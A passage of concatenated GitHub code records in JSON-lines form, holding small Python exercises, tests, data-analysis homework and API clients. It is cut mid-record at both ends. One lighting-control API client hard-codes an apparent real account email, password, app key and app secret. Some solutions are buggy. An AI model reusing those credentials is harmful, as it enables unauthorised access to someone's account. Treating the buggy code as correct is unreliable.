228.7K\n# Total Submissions: 773.8K\n# Testcase Example: '[[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]]\\n\"ABCCED\"'\n#\n# Given a 2D board and a word, find if the word exists in the grid.\n#\n# The word can be constructed from letters of sequentially adjacent cell, where\n# \"adjacent\" cells are those horizontally or vertically neighboring. The same\n# letter cell may not be used more than once.\n#\n# Example:\n#\n#\n# board =\n# [\n# ⁠ ['A','B','C','E'],\n# ⁠ ['S','F','C','S'],\n# ⁠ ['A','D','E','E']\n# ]\n#\n# Given word = \"ABCCED\", return true.\n# Given word = \"SEE\", return true.\n# Given word = \"ABCB\", return false.\n#\n#\n#\nimport copy\n\nclass Solution:\n def is_valid(self, board, pos):\n r,c = pos\n if 0 <= r < len(board) and 0 <= c < len(board[0]):\n return True\n return False\n\n def helper(self, board, avail, pos, word, idx, results):\n letter = word[idx]\n r,c = pos\n if avail[r][c] and letter == board[r][c]:\n idx += 1\n if idx == len(word):\n results.append(True)\n return\n avail[r][c] = False\n if self.is_valid(board, (r-1,c)):\n new_avail = copy.deepcopy(avail)\n self.helper(board, new_avail, (r-1,c), word, idx+1, results)\n if self.is_valid(board, (r+1,c)):\n new_avail = copy.deepcopy(avail)\n self.helper(board, new_avail, (r+1,c), word, idx+1, results)\n if self.is_valid(board, (r,c-1)):\n new_avail = copy.deepcopy(avail)\n self.helper(board, new_avail, (r,c-1), word, idx+1, results)\n if self.is_valid(board, (r,c+1)):\n new_avail = copy.deepcopy(avail)\n self.helper(board, new_avail, (r,c+1), word, idx+1, results)\n return\n\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n avail = [[True for col in row] for row in board]\n idx = 0\n results = list()\n for r in range(len(board)):\n for c in range(len(board[0])):\n self.helper(board, avail, (r,c), word, idx, results)\n return any(results)\n\n","repo_name":"richnakasato/lc","sub_path":"79.word-search.0.python3.py","file_name":"79.word-search.0.python3.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26997146067","text":"#!/usr/bin/python3.8\n# -*- coding: utf-8 -*-\n# @Time : 2020/12/8 14:52\n# @File : test_customers.py\n# @Author : 黄权权\n# @Software: PyCharm\n# @Desc : 环境:自动构造创建已存在客户\nimport time\n\nimport allure\nimport pytest\n\nfrom pylib.UIlib.pageObjects.commonPage import CommonPage\nfrom pylib.UIlib.pageObjects.customersDetailPage import CustomersDetailPage\nfrom pylib.UIlib.pageObjects.signedCustomersPage import SignedCustomersPage\nfrom pylib.UIlib.pageObjects.waitingCustomersPage import WaittingCustomersPage\nfrom utils.tools import read_yaml\n\n\n@allure.epic(\"UI模块-CRM系统\")\n@allure.feature(\"客户管理\")\nclass TestCustomer:\n\n @pytest.fixture()\n def before_test_createCustomer(self, init_customers):\n self.commonPage = init_customers[0]\n self.waittingCustomersPage = init_customers[1]\n self.costomersInfo = init_customers[2]\n yield\n # 刷新页面,退出iframe 或者\n # self.waittingCustomers.switch_to_default_content() 回到默认iframe\n self.waittingCustomersPage.refresh()\n # 关闭待跟客户tab页\n self.commonPage.close_WaittingCustomersPage_tab()\n\n @allure.story(\"客户管理-待跟客户\")\n @allure.title(\"创建客户\")\n # @pytest.mark.skip(\"暂不执行\")\n def test_createCustomer(self, before_test_createCustomer):\n \"\"\"\n 当前账号已有客户,创建一个新的客户\n :return:\n \"\"\"\n # 点击客户管理\n self.commonPage.click_customerManagement()\n # 点击待跟客户\n self.commonPage.click_waittingCustomers()\n # 切换到对应的待跟客户iframe,进行创建客户\n self.commonPage.switch_to_waittingCustomers_iframe()\n # 创建客户\n self.waittingCustomersPage.createCustomers()\n # 创建完毕,自动关闭弹窗,等待3秒,防止弹窗未关闭就进行操作导致失败\n time.sleep(3)\n # 刷新页面,重新进入待跟客户iframe\n self.commonPage.refresh()\n self.commonPage.switch_to_waittingCustomers_iframe()\n # 查找刚创建的客户\n # 获取刚才创建的客户信息\n customersInfo = read_yaml(\"configs/createCustomers.yaml\")\n name = customersInfo[\"customersInfo\"][\"name\"]\n # 根据公司名称查找客户\n self.waittingCustomersPage.find_customers(name)\n # 获取查找结果的列表信息\n messages = self.waittingCustomersPage.get_tables_costomersInfo()\n assert name == messages[\"name\"]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Hquanquan/Auto_project_testing_framework","sub_path":"testcase/UI测试用例/用户登录/创建客户/test_customers.py","file_name":"test_customers.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5967352838","text":"totalTicketNumber = 100\r\nmaxTicketNumber = 4\r\npeople = 0\r\n\r\nwhile totalTicketNumber > 0:\r\n ticketNumber = int(input(\"Enter the numbers of ticket that you want to: \"))\r\n if totalTicketNumber <= maxTicketNumber:\r\n maxTicketNumber = totalTicketNumber\r\n if ticketNumber <= maxTicketNumber:\r\n totalTicketNumber -= ticketNumber\r\n print(\"The remaining ticket is %d:\" % totalTicketNumber)\r\n people += 1\r\n else:\r\n print(\"You cant buy more than %d tickets\" % maxTicketNumber)\r\n\r\nprint(\"%d people bought the tickets.\" % people)","repo_name":"mhcekic22/2021_LABS","sub_path":"LAB_05/solution_07.py","file_name":"solution_07.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4442612417","text":"def tekst_ascii_arvudeks(tekst: str) -> str:\n return ' '.join(map(lambda x: str(ord(x)), tekst))\n\n\ndef ascii_arvudest_tekstiks(tekst: str) -> str:\n return ''.join(map(lambda x: chr(int(x)), tekst.split(' ')))\n\n\ndef tekst_ascii_arvudeks_failist(fn: str, fout: str) -> str:\n with open(fn, 'r') as f:\n output = tekst_ascii_arvudeks(f.read())\n with open(fout, 'w') as f:\n f.write(output)\n return output\n\n\ndef ascii_arvudest_tekstiks_failist(fn: str, fout: str) -> str:\n with open(fn, 'r') as f:\n output = ascii_arvudest_tekstiks(f.read())\n with open(fout, 'w') as f:\n f.write(output)\n return output\n\n\ndef display_menu() -> None:\n print('Vali mida tegema:')\n print('\\t1. Arvust tekstiks.')\n print('\\t2. Tekstist arvuks.')\n print('\\t3. Arvust tekstiks. Failid')\n print('\\t4. Tekstist arvuks. Failid')\n print('\\t5. Vaikimisi. Näide\\n')\n print('\\t0, q või exit lõpetamiseks.\\n')\n\n\nif __name__ == '__main__':\n while True:\n display_menu()\n user_input = input()\n if user_input in ['0', 'q', 'exit']:\n break\n elif user_input == '1':\n print(ascii_arvudest_tekstiks(input('Palun, sisesta sõne: ')))\n elif user_input == '2':\n print(tekst_ascii_arvudeks(input('Palun, sisesta sõne: ')))\n elif user_input == '3':\n print(ascii_arvudest_tekstiks_failist(\n input('Palun, sisesta sisend faili: '), 'väljund.txt'))\n elif user_input == '4':\n print(tekst_ascii_arvudeks_failist(\n input('Palun, sisesta sisend faili: '), 'väljund.txt'))\n elif user_input == '5':\n print(tekst_ascii_arvudeks_failist(\n 'näide.txt', 'väljund.txt'))\n else:\n print('Palun, sisestage õiget valikud.')\n","repo_name":"Haavi97/opetamiseks","sub_path":"tekst_ascii/tekst_ascii_arvudeks.py","file_name":"tekst_ascii_arvudeks.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40279405737","text":"from common.constant import BASE_URL, X_AUTH_TOKEN\nfrom common.api import Session, Command, Status\n\n\ndef main():\n session = Session(BASE_URL, X_AUTH_TOKEN).start(problem=1)\n while session.status == Status.READY:\n locations = session.get_locations()\n trucks = session.get_trucks()\n session.simulate([\n {'truck_id': 0, 'command': [Command.NOTHING]},\n ])\n print(f\"{session.time}: {session.failed_requests_count}\")\n print(session.get_score())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"heoh/kakao-blind-test-2021-2","sub_path":"api_test.py","file_name":"api_test.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6073376382","text":"import time\ndef heapify(arr, n, i): \n largest = i\n left = 2 * i + 1 \n right = 2 * i + 2 \n \n if left < n and arr[i] < arr[left]: \n largest = left\n \n if right < n and arr[largest] < arr[right]: \n largest = right\n \n # Change root if needed\n if largest != i:\n arr[i],arr[largest] = arr[largest],arr[i] \n \n # Heapify the root. \n heapify(arr, n, largest)\n \n# Heap Sort\ndef heapSort(arr): \n n = len(arr) \n for i in range(n // 2 - 1, -1, -1): \n heapify(arr, n, i)\n \n for i in range(n-1, 0, -1): \n # swap the largest item with root node \n arr[i], arr[0] = arr[0], arr[i]\n heapify(arr, i, 0)\n \n# For Array length 2000\na1 = []\nfor i in range(0,2000):\n a1.append(i)\nt1 = time.time()\nheapSort(a1) \nt2 = time.time()\nprint(\"--------------------------------------------------------------------\")\n \nprint(\"Time for array with length 2000 is: \", t2-t1)\n \nprint(\"--------------------------------------------------------------------\")\n \n# For Array length 4000\na2 = []\nfor i in range(0,4000):\n a2.append(i)\nt3 = time.time()\nheapSort(a2)\nt4 = time.time()\n \nprint(\"Time for array with length 4000 is: \", t4-t3)\n \nprint(\"--------------------------------------------------------------------\")\n \n# For array with length 6000\na3 = []\nfor i in range(0,6000):\n a3.append(i)\nt5 = time.time()\nheapSort(a3)\nt6 = time.time()\n \nprint(\"Time for array with length 6000 is: \", t6-t5)\n \nprint(\"--------------------------------------------------------------------\")\n \n# For array with length 8000\na4 = []\nfor i in range(0,8000):\n a4.append(i)\nt7 = time.time()\nheapSort(a4)\nt8 = time.time()\n \nprint(\"Time for array with length 8000 is: \", t8-t7)\n \nprint(\"--------------------------------------------------------------------\")\n \n# For array with length 10000\na5 = []\nfor i in range(0,10000):\n a5.append(i)\nt9 = time.time()\nheapSort(a5)\nt10 = time.time()\n \nprint(\"Time for array with length 10000 is: \", t10-t9)\n","repo_name":"mad003/Sorting-Algos","sub_path":"Python/HeapSort.py","file_name":"HeapSort.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"38119088209","text":"\nimport pandas as pd\nimport numpy as np\nimport glob\nimport os\n\ndef major_drop(df):\n \"\"\"\n major_drop removes the columns specified in the write up\n \"\"\"\n\n columns = [i for i in df.columns if 'Lab' in i]\n columns += [i for i in df.columns if 'Quiz' in i]\n columns += [i for i in df.columns if 'Project' in i]\n columns += [i for i in df.columns if 'Midterm' and 'Lateness' in i]\n columns += [i for i in df.columns if 'Final' and 'Lateness' in i]\n columns += [i for i in df.columns if 'Total Lateness' in i]\n\n columns = list(set(columns))\n df = df.drop(columns, axis=1)\n return df\n\n\ndef merged_exams(df):\n \"\"\"\n major_drop removes the columns specified in the write up\n \"\"\"\n\n df.replace(np.NaN, 0, inplace=True)\n df[\"Midterm Grades\"] = df[\"Midterm V1\"] + df[\"Midterm V2\"] + df[\"Midterm V3\"]\n df[\"Final Grades\"] = df[\"DSC20 Final V2\"] + df[\"DSC20 Final\"]\n a = [\"Midterm V1\", \"Midterm V2\", \"Midterm V3\", \"DSC20 Final\", \"DSC20 Final V2\"]\n df = df.drop(a, axis=1)\n return df\n\n\ndef read_all(dirname):\n \"\"\"\n Finds and reads .csv files from the timeData directory\n \"\"\"\n file = os.listdir(dirname)\n lst = []\n for i in file:\n f = dirname + \"/\" + i\n df = pd.read_csv(f)\n lst.append(df)\n return lst\n\n\ndef extract_and_create(hws):\n \"\"\"\n \"\"\"\n #file = read_all(hws)\n for i in hws:\n i['Lateness (H:M:S)'].replace(np.NaN, '00:00:00', inplace=True)\n\n type_each = []\n master = []\n for i in hws:\n # print(i)\n for j in i['Lateness (H:M:S)']:\n if (j > \"24:00:00\" and j < '48:00:00'):\n type_each.append(2)\n elif (j > \"00:00:00\" and j < \"24:00:00\"):\n type_each.append(1)\n else:\n type_each.append(0)\n i[\"type\"] = type_each\n master.append(type_each)\n type_each = []\n\n penalty_20 = []\n penalty_50 = []\n\n df = pd.DataFrame(master)\n for i in df.columns:\n a = df[i].tolist().count(1)\n b = df[i].tolist().count(2)\n\n penalty_20.append(a)\n penalty_50.append(b)\n\n new_df = {'Penalty_20': penalty_20,\n 'Penalty_50': penalty_50}\n\n return pd.DataFrame(new_df)\n\n\n\n\ndef compute_stats(fh1, fh2, fh3):\n \"\"\"\n >>> fh1, fh2, fh3 = open('linkedin1.csv'), open('linkedin2.csv'), open('linkedin3.csv')\n >>> out = compute_stats(fh1, fh2, fh3)\n >>> set(map(lambda x:isinstance(x, str), out)) == {True}\n True\n >>> len(out) # first name, job, slogan, animal\n 4\n \"\"\"\n\n a = pd.read_csv(fh1)\n b = pd.read_csv(fh2)\n c = pd.read_csv(fh3)\n a = a.drop('Unnamed: 0', axis=1)\n b = b.rename(columns={'first_name': 'firstname'})\n b = b.rename(columns={'favorite_animal': 'favoriteanimal'})\n c = c.rename(columns={'COMPANY': 'company'})\n c = c.rename(columns={'OTHER': 'other'})\n c = c.rename(columns={'JOB': 'job'})\n c = c.rename(columns={'FIRSTNAME': 'firstname'})\n c = c.rename(columns={'SLOGAN': 'slogan'})\n c = c.rename(columns={'FAVORITEANIMAL': 'favoriteanimal'})\n\n combined = pd.merge(a, b, how='outer')\n new_combined = pd.merge(combined, c, how='outer')\n\n name = new_combined.groupby(['firstname']).size().idxmax()\n job = new_combined.groupby(['job']).size().idxmax()\n slogan = new_combined.groupby(['slogan']).size().idxmax()\n favorite = new_combined.groupby(['favoriteanimal']).size().idxmax()\n\n return [name, job, slogan, favorite]\n\n\n\ndef job_word_distribution(jobtitles):\n \"\"\"\n >>> salaries = pd.read_csv('san-diego-2017.csv')\n >>> jobtitle = salaries['Job Title']\n >>> out = job_word_distribution(jobtitle)\n >>> 'Police' in out.index\n True\n >>> set(map(lambda x:x.count(' ') == 0, out.index)) == {True}\n True\n >>> (len(out) >= 500) and (len(out) <= 550) # number of distinct words\n True\n \"\"\"\n\n jobtitles = jobtitles.str.cat(sep=' ')\n a = jobtitles.split()\n\n return pd.Series(a).value_counts()\n\n\n\ndef describe_salaries_by_job_type(salaries):\n \"\"\"\n >>> salaries = pd.read_csv('san-diego-2017.csv')\n >>> out = describe_salaries_by_job_type(salaries)\n >>> (out.columns == ['count', 'mean', 'std', 'min', '25%', '50%', '75%', 'max']).all()\n True\n \"\"\"\n job_types = ['Police', 'Fire', 'Libr', 'Rec', 'Grounds', 'Lifeguard', 'Water', 'Equip', 'Utility', 'Clerical',\n 'Administrative', 'Sanitation', 'Principal', 'Public', 'Dispatcher']\n lst = []\n for i in range(salaries['Job Title'].count()):\n # for j in salaries['Job Title'][i].split():\n for j in job_types:\n if j in salaries['Job Title'][i]:\n lst.append(j)\n else:\n lst.append('other')\n # if j in job_types:\n # a = salaries['Total Pay'].describe\n # salaries['new'] = lst\n salaries['new'] = pd.Series(lst)\n common = salaries.groupby('new')\n return common['Total Pay'].describe()\n\n\n\ndef std_salaries_by_job_type(salaries):\n \"\"\"\n >>> salaries = pd.read_csv('san-diego-2017.csv')\n >>> out = std_salaries_by_job_type(salaries)\n >>> set(out.columns) == set(['Base Pay', 'Overtime Pay', 'Total Pay', 'Job Type'])\n True\n >>> np.all(abs(out.select_dtypes(include='number').mean()) < 10**-7) # standard units should average to 0!\n True\n \"\"\"\n\n job_types = ['Police', 'Fire', 'Libr', 'Rec', 'Grounds', 'Lifeguard', 'Water', 'Equip', 'Utility', 'Clerical',\n 'Administrative', 'Sanitation', 'Principal', 'Public', 'Dispatcher']\n lst = []\n for i in range(salaries['Job Title'].count()):\n # for j in salaries['Job Title'][i].split():\n for j in job_types:\n if j in salaries['Job Title'][i]:\n lst.append(j)\n else:\n lst.append('other')\n # if j in job_types:\n # a = salaries['Total Pay'].describe\n # salaries['new'] = lst\n salaries['new'] = pd.Series(lst)\n common = salaries.groupby('new')\n x = common.transform(lambda x: (x - x.mean()) / x.std())\n df = {'Job Type': salaries['new'],\n 'Base Pay': x['Base Pay'],\n 'Overtime Pay': x['Overtime Pay'],\n 'Total Pay': x['Total Pay']}\n\n return pd.DataFrame(df)\n\n\ndef bucket_total_pay(totpay):\n \"\"\"\n >>> salaries = pd.read_csv('san-diego-2017.csv')\n >>> out = bucket_total_pay(salaries['Total Pay'])\n >>> set(np.unique(out)) == set(range(1,11))\n True\n >>> np.all(np.abs(np.histogram(out)[0] - out.size/10) < 1) # equal bin sizes!\n True\n \"\"\"\n bins = (np.percentile(totpay, np.arange(10, 101, 10))).astype(int)\n lst = []\n for i in range(totpay.count()):\n if totpay[i] <= bins[0]:\n lst.append(1)\n if totpay[i] <= bins[1] and totpay[i] > bins[0]:\n lst.append(2)\n if totpay[i] <= bins[2] and totpay[i] > bins[1]:\n lst.append(3)\n if totpay[i] <= bins[3] and totpay[i] > bins[2]:\n lst.append(4)\n if totpay[i] <= bins[4] and totpay[i] > bins[3]:\n lst.append(5)\n if totpay[i] <= bins[5] and totpay[i] > bins[4]:\n lst.append(6)\n if totpay[i] <= bins[6] and totpay[i] > bins[5]:\n lst.append(7)\n if totpay[i] <= bins[7] and totpay[i] > bins[6]:\n lst.append(8)\n if totpay[i] <= bins[8] and totpay[i] > bins[7]:\n lst.append(9)\n if totpay[i] <= bins[9] and totpay[i] > bins[8]:\n lst.append(10)\n # if totpay[i] >= bins[9]:\n # lst.append(10)\n\n return pd.Series(lst)\n\ndef mean_salary_per_decile(salaries):\n \"\"\"\n >>> salaries = pd.read_csv('san-diego-2017.csv')\n >>> out = mean_salary_per_decile(salaries)\n >>> len(out) == 10\n True\n >>> 50000 <= out[5] <= 60000\n True\n \"\"\"\n\n totpay = salaries['Total Pay']\n bins = (np.percentile(totpay, np.arange(10, 101, 10))).astype(int)\n lst = []\n lst2 = []\n lst3 = []\n lst4 = []\n lst5 = []\n lst6 = []\n lst7 = []\n lst8 = []\n lst9 = []\n lst10 = []\n for i in range(totpay.count()):\n if totpay[i] <= bins[0]:\n lst.append(totpay[i])\n if totpay[i] <= bins[1] and totpay[i] > bins[0]:\n lst2.append(totpay[i])\n if totpay[i] <= bins[2] and totpay[i] > bins[1]:\n lst3.append(totpay[i])\n if totpay[i] <= bins[3] and totpay[i] > bins[2]:\n lst4.append(totpay[i])\n if totpay[i] <= bins[4] and totpay[i] > bins[3]:\n lst5.append(totpay[i])\n if totpay[i] <= bins[5] and totpay[i] > bins[4]:\n lst6.append(totpay[i])\n if totpay[i] <= bins[6] and totpay[i] > bins[5]:\n lst7.append(totpay[i])\n if totpay[i] <= bins[7] and totpay[i] > bins[6]:\n lst8.append(totpay[i])\n if totpay[i] <= bins[8] and totpay[i] > bins[7]:\n lst9.append(totpay[i])\n if totpay[i] <= bins[9] and totpay[i] > bins[8]:\n lst10.append(totpay[i])\n\n return pd.Series([np.mean(lst), np.mean(lst2), np.mean(lst3), np.mean(lst4), np.mean(lst5), np.mean(lst6),\n np.mean(lst7), np.mean(lst8), np.mean(lst9), np.mean(lst10)],\n index=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\n\n\n\ndef robo_table(phones):\n \"\"\"\n >>> phones = pd.read_csv('phones.csv')\n >>> out = robo_table(phones)\n >>> set(out.columns) == set(['id', 'first_name', 'last_name', 'phone'])\n True\n >>> _ = out.phone.dropna().astype(int)\n \"\"\"\n df = phones\n\n phone = df['cell_phone'].fillna(df['home_phone'])\n phone = phone.fillna(df['work_phone'])\n phone = phone.apply(str)\n\n a = phone.notnull()\n for i in range(phone.count()):\n if a[i]:\n filter(lambda x: x.isdigit(), phone[i])\n phone[i] = str(phone[i])\n phone[i] = phone[i].replace('.0', '')\n\n newdf = {'id': df.id,\n 'first_name': df.first_name,\n 'last_name': df.last_name,\n 'phone': phone}\n\n return pd.DataFrame(newdf)\n\n\nimport re\ndef read_names(dirname):\n \"\"\"\n >>> out = read_names('names')\n >>> set(out.columns) == set(['first_name', 'sex', 'number', 'year'])\n True\n >>> out.year.nunique()\n 138\n \"\"\"\n\n file = os.listdir(dirname)\n # print(file)\n lst = []\n for i in file:\n f = dirname + \"/\" + i\n columns = ['first_name', 'sex', 'number']\n df = pd.read_csv(f, names=columns, header=None)\n year = re.search('yob(.*).txt', i).group(1)\n # year = re.search('yob(.*).txt', i)\n df['year'] = year\n lst.append(df)\n\n frame = pd.concat(lst, axis=0, ignore_index=True)\n\n return frame\n\n\n\n","repo_name":"Hetsvi/basics-data-science","sub_path":"Data combining.py","file_name":"Data combining.py","file_ext":"py","file_size_in_byte":10634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37173146953","text":"# -*- coding: utf-8 -*-\nimport time\nimport json\nimport requests\nimport socket\nfrom struct import pack\n\nimport telnetlib\n\n\nclass API:\n def __init__(self, **kwargs):\n # Initialized common attributes\n self.variables = kwargs\n self.debug = True\n self.set_variable('offline_count', 0)\n self.set_variable('connection_renew_interval', 6000)\n\n def renewConnection(self):\n pass\n\n def set_variable(self, k, v): # k=key, v=value\n self.variables[k] = v\n\n def get_variable(self, k):\n return self.variables.get(k, None) # default of get_variable is none\n\n '''\n Attributes:\n ------------------------------------------------------------------------------------------\n label GET label in string\n status GET status\n unitTime GET time\n type GET type \n ------------------------------------------------------------------------------------------\n '''\n\n '''\n API3 available methods:\n 1. getDeviceStatus() GET\n 2. setDeviceStatus() SET\n '''\n\n # ----------------------------------------------------------------------\n # setDeviceStatus(postmsg), isPostmsgValid(postmsg), convertPostMsg(postmsg)\n def setDeviceStatus(self, postmsg, access_token):\n setDeviceStatusResult = True\n\n if self.isPostMsgValid(postmsg) == True: # check if the data is valid\n\n # _data = json.dumps(self.convertPostMsg(postmsg))\n # _data = _data.encode(encoding='utf_8')\n _data = self.convertPostMsg(postmsg)\n print(\"DATA status = {}\".format(_data))\n\n # get access token\n if access_token is None:\n access_token = self.get_token()\n\n # send data\n try:\n url = \"https://api.interact-lighting.com/interact/api/v1/officeCloud/lightingSpaces/\" + self.get_variable('uuid') + \"/lightState\"\n header = {\"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer \" + access_token}\n\n response = requests.put(url, data=json.dumps(_data), headers=header)\n print(\"Status Code = {}\".format(response.content))\n self.set_variable('status', _data)\n\n except Exception as err:\n print(\"ERROR: {}\".format(err))\n print(\"ERROR: classAPI_Interact_Lighting connection failure! @ setDeviceStatus\")\n setDeviceStatusResult = False\n else:\n print(\"The POST message is invalid, try again\\n\")\n\n return setDeviceStatusResult\n\n def isPostMsgValid(self, postmsg): # check validity of postmsg\n dataValidity = True\n # TODO algo to check whether postmsg is valid\n return dataValidity\n\n def convertPostMsg(self, postmsg):\n msgToDevice = {}\n\n for k, v in postmsg.items():\n if str(k) == 'status':\n msgToDevice['state'] = postmsg['status'].upper() # off, on, automatic, dim\n elif str(k) == 'level':\n msgToDevice['level'] = postmsg['level']\n else:\n msgToDevice[k] = v\n\n return msgToDevice\n\n def get_token(self):\n try:\n url = \"https://api.interact-lighting.com/oauth/accesstoken\"\n header = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n auth = ('phanumat.saa@pea.co.th', 'Pea2534+')\n data = {\"app_key\": \"Bq0kEixitmZx4rfIEalsU4BZItpxcvbQ\",\n \"app_secret\": \"GEBks337G8hXeoOC\",\n \"service\": \"cb\"}\n response = requests.post(url, auth=auth, data=data, headers=header)\n result = json.loads(response.text)\n return result[\"token\"]\n except Exception as err:\n print(err)\n\n # ----------------------------------------------------------------------\n\n\n# This main method will not be executed when this class is used as a module\ndef main():\n\n interact = API(model='Interact', api='API3', agent_id='25INTF73D39F6', types='lighting',\n uuid='32302d84-6872-4341-99bf-cd1f55255572')\n\n interact.setDeviceStatus({\"status\": \"on\"})\n # interact.setDeviceStatus({\"status\": \"off\"})\n # interact.setDeviceStatus({\"status\": \"automatic\"})\n # interact.setDeviceStatus({\"status\": \"dim\", \"level\": 10})\n # time.sleep(3)\n\n\nif __name__ == \"__main__\": main()\n","repo_name":"Soulweed/Agent","sub_path":"InteractLightingAgent/interactlightingagent/extension/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74350123450","text":"\"\"\"\nSearch API Documentation at https://elasticsearch-dsl.readthedocs.io/en/latest/search_dsl.html\n\"\"\"\n\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search, Q\n\nclient = Elasticsearch()\n\n\n# Match all documents\ndef match_all():\n s = Search(using=client, index=\"sample_film_index\")\n s = s.query('match_all')\n response = s.execute()\n print(\"Num hits:\", len(response.to_dict()['hits']['hits'])) # default 10 limit\n\n\n# Search in title\ndef free_search_in_title(word):\n s = Search(using=client, index=\"sample_film_index\")\n # Q is a shortcut for constructing a query object\n q = Q('match', title=word)\n # At some point, q has to be added to the search object.\n s = s.query(q)\n s = s.highlight_options(pre_tags='', post_tags='') # for html\n s = s.highlight('title', word, fragment_size=999999999, number_of_fragments=1)\n response = s.execute()\n print(\"Num hits for\", word, len(response.to_dict()['hits']['hits']))\n for hit in response:\n print(hit.meta.score) # doc score\n print(hit.meta.highlight) # highlighted snippet\n\n\n# Match exact phrase in text\ndef match_phrase_in_text(phrase):\n s = Search(using=client, index=\"sample_film_index\")\n q = Q('match_phrase', text=phrase)\n s = s.query(q)\n s = s.highlight_options(pre_tags='', post_tags='') # for html\n s = s.highlight('text', fragment_size=999999999, number_of_fragments=1)\n response = s.execute()\n print(\"Num hits for\", phrase, len(response.to_dict()['hits']['hits']))\n for hit in response:\n print(hit.meta.score) # doc score\n print(hit.meta.highlight) # highlighted snippet\n\n\ndef test_analyzer(text, analyzer):\n \"\"\"\n you might want to test your analyzer after you define it\n :param text: a string\n :param analyzer: the analyzer you defined\n :return: list of tokens processed by analyzer\n \"\"\"\n output = analyzer.simulate(text)\n return [t.token for t in output.tokens]\n\n\nmatch_all()\nfree_search_in_title('cats')\n# Compare to:\nfree_search_in_title('Cats') # the 'simple' analyzer does lowercasing\nfree_search_in_title('cat') # but not stemming\nmatch_phrase_in_text('she knows')\n","repo_name":"chauncyf/132-Elastic_Search","sub_path":"sample_queries.py","file_name":"sample_queries.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"4341220890","text":"# https://leetcode.com/problems/missing-number/\n# Given an array nums containing n distinct numbers in the range [0, n], return the only number in the range that is missing from the array.\n\n# Follow up: Could you implement a solution using only O(1) extra space complexity and O(n) runtime complexity?\n\n# Example 1:\n\n# Input: nums = [3,0,1]\n# Output: 2\n# Explanation: n = 3 since there are 3 numbers, so all numbers are in the range [0,3]. 2 is the missing number in the range since it does not appear in nums.\n# Example 2:\n\n# Input: nums = [0,1]\n# Output: 2\n# Explanation: n = 2 since there are 2 numbers, so all numbers are in the range [0,2]. 2 is the missing number in the range since it does not appear in nums.\n# Example 3:\n\n# Input: nums = [9,6,4,2,3,5,7,0,1]\n# Output: 8\n# Explanation: n = 9 since there are 9 numbers, so all numbers are in the range [0,9]. 8 is the missing number in the range since it does not appear in nums.\n# Example 4:\n\n# Input: nums = [0]\n# Output: 1\n# Explanation: n = 1 since there is 1 number, so all numbers are in the range [0,1]. 1 is the missing number in the range since it does not appear in nums.\n\n\n# Constraints:\n\n# n == nums.length\n# 1 <= n <= 104\n# 0 <= nums[i] <= n\n# All the numbers of nums are unique.\nclass Solution(object):\n def missingNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums.sort()\n # plus 1 is to add the missing number, minus 1 is to take out 0\n n = len(nums) + 1 - 1\n\n # using Guass's formula for sum of a consecutive range:\n total_if_not_missing = n*(n+1)/2\n actual_total = sum(nums)\n\n missing_num = total_if_not_missing - actual_total\n return missing_num\n\n\ns = Solution()\nnums1 = [9, 6, 4, 2, 3, 5, 7, 0, 1]\nprint(s.missingNumber(nums1))\n","repo_name":"trinhgliedt/Algo_Practice","sub_path":"2021_06_10_missing_number.py","file_name":"2021_06_10_missing_number.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37944574519","text":"'''\r\nImplemente uma função que calcula o menor custo de atravessar uma região de\r\nNorte para Sul. O mapa da região é rectangular, dado por uma lista de strings,\r\nonde cada digito representa a altura de cada ponto. Só é possível efectuar \r\nmovimentos na horizontal ou na vertical, e só é possível passar de um ponto\r\npara outro se a diferença de alturas for inferior ou igual a 2, sendo o custo \r\ndesse movimento 1 mais a diferença de alturas. O ponto de partida (na linha\r\nmais a Norte) e o ponto de chegada (na linha mais a Sul) não estão fixados à\r\npartida, devendo a função devolver a coordenada horizontal do melhor\r\nponto para iniciar a travessia e o respectivo custo. No caso de haver dois pontos\r\ncom igual custo, deve devolver a coordenada mais a Oeste.\r\n'''\r\n\r\nmapa1 = [\"4563\",\r\n \"9254\",\r\n \"7234\",\r\n \"3231\",\r\n \"3881\"]\r\n\r\nmapa2 = [\"90999\",\r\n \"00000\",\r\n \"92909\",\r\n \"94909\"]\r\n\r\nmapa3 = [\"000\",\r\n \"888\",\r\n \"111\"]\r\n\r\n\r\ndef travessia(mapa):\r\n final=[]\r\n moves = [(1, 0), (0, 1), (-1, 0), (0, -1)]\r\n\r\n #Fazer a travessia em cada ponto da primeira linha\r\n for i in range(len(mapa[0])):\r\n adj = {}\r\n pai = {}\r\n dist = {}\r\n o = (i, 0)\r\n dist[o] 